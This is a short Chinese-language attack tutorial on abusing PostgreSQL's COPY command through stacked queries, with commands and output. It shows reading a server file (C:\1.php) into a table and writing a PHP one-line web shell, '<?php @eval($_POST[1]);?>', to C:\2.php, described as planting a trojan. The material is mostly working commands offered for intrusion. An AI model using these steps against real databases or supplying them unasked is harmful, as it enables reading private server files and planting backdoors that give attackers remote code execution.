0x00 注意点

要有对应的权限,这点很好理解吧,普通用户一般是不行的。

0x01 读文件的方法

  1. # 需要注意, 如果无法堆叠的话, 该方法无法使用
  3. # 创建一张新表
  4. create table f(file_data text not null);
  6. # 读取 C:\1.php数据 复制内容到 f表的 file_data字段
  7. copy f(file_data) from 'C:\1.php';
  9. # 通过普通语句读取出数据
  10. # limit 1 读一行
  11. # OFFSET 0 下标从0开始  0==读第一行数据
  12. select file_data from f limit 1 OFFSET 0;
  14. # 删除f表
  15. drop table f;
  1. # 执行结果
  2. skylar=# 
  3. create table f(file_data text not null);
  4. copy f(file_data) from 'C:\1.php';
  5. select file_data from f limit 1 OFFSET 0;
  6. drop table f;
  7. Command OK
  9. Command OK - 1 row affected
  11. +----------------+
  12. | file_data      |
  13. +----------------+
  14. | 12312123123123 |
  15. +----------------+
  16. 1 row in set
  18. Command OK

0x02 写文件的方法

  1. # 需要注意, 如果无法堆叠的话, 该方法无法使用
  2. 命令结束: copy (select '一句话木马的代码') to '写马的路径';
  4. 命令2: copy (select '<?php @eval($_POST[1]);?>') to 'C:\2.php';
  1. # 执行结果
  2. # 执行完毕以后就会在 
  3. # c盘 跟目录生成一个 2.php 
  4. # 内容为 <?php @eval($_POST[1]);?> 的一句话木马
  5. skylar=# copy (select '<?php @eval($_POST[1]);?>') to 'C:\2.php';
  6. Command OK - 1 row affected

image.png